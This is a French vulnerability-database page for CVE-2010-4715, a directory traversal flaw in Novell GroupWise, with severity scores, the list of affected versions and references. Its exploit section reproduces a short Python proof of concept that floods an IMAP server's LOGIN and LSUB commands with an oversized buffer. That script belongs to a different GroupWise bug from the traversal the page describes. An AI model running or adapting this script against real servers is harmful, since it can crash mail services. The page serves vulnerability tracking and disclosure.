CVE-2010-4715 : Détail

CVE-2010-4715

Directory Traversal
A01-Broken Access Control
0.95%V3
Network
2011-01-31
19h00 +00:00
2024-09-17
03h28 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Multiple directory traversal vulnerabilities in the (1) WebAccess Agent and (2) Document Viewer Agent components in Novell GroupWise before 8.02HP allow remote attackers to read arbitrary files via unspecified vectors. NOTE: some of these details are obtained from third party information.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 5 AV:N/AC:L/Au:N/C:P/I:N/A:N [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 34980

Date de publication : 2010-11-07 23h00 +00:00
Auteur : Francis Provencher
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/44732/info Novell GroupWise is prone to multiple security vulnerabilities, including multiple remote code-execution vulnerabilities, an information-disclosure issue, and a cross-site scripting issue. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, obtain potentially sensitive information, or execute arbitrary code in the context of the user running the affected application. Information harvested may aid in further attacks; other attacks are also possible. #!/usr/bin/python # # Francis Provencher for Protek Research Lab's. # # import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) buffer = '\x41' * 1368 s.connect(('192.168.100.178',143)) s.recv(1024) s.send('A001 LOGIN test test ' + buffer + '\r\n') s.recv(1024) s.send('A001 LSUB aa ' + buffer + '\r\n') s.recv(1024) s.close()

Products Mentioned

Configuraton 0

Novell>>Groupwise >> Version To (including) 8.0.2

Novell>>Groupwise >> Version 4.1

    Novell>>Groupwise >> Version 4.1a

      Novell>>Groupwise >> Version 5.0

        Novell>>Groupwise >> Version 5.1

          Novell>>Groupwise >> Version 5.2

          Novell>>Groupwise >> Version 5.5

          Novell>>Groupwise >> Version 5.5

            Novell>>Groupwise >> Version 5.57e

            Novell>>Groupwise >> Version 6.0

            Novell>>Groupwise >> Version 6.0

              Novell>>Groupwise >> Version 6.0

                Novell>>Groupwise >> Version 6.0.1

                Novell>>Groupwise >> Version 6.5

                Novell>>Groupwise >> Version 6.5

                Novell>>Groupwise >> Version 6.5

                Novell>>Groupwise >> Version 6.5

                Novell>>Groupwise >> Version 6.5

                Novell>>Groupwise >> Version 6.5

                Novell>>Groupwise >> Version 6.5

                Novell>>Groupwise >> Version 6.5.2

                Novell>>Groupwise >> Version 6.5.3

                Novell>>Groupwise >> Version 6.5.4

                Novell>>Groupwise >> Version 6.5.6

                Novell>>Groupwise >> Version 6.5.7

                Novell>>Groupwise >> Version 7.0

                Novell>>Groupwise >> Version 7.0.1

                  Novell>>Groupwise >> Version 7.0.2

                    Novell>>Groupwise >> Version 7.0.3

                    Novell>>Groupwise >> Version 7.0.4

                    Novell>>Groupwise >> Version 8.0

                    Novell>>Groupwise >> Version 8.0.1

                      Références

                      http://secunia.com/advisories/40820
                      Tags : third-party-advisory, x_refsource_SECUNIA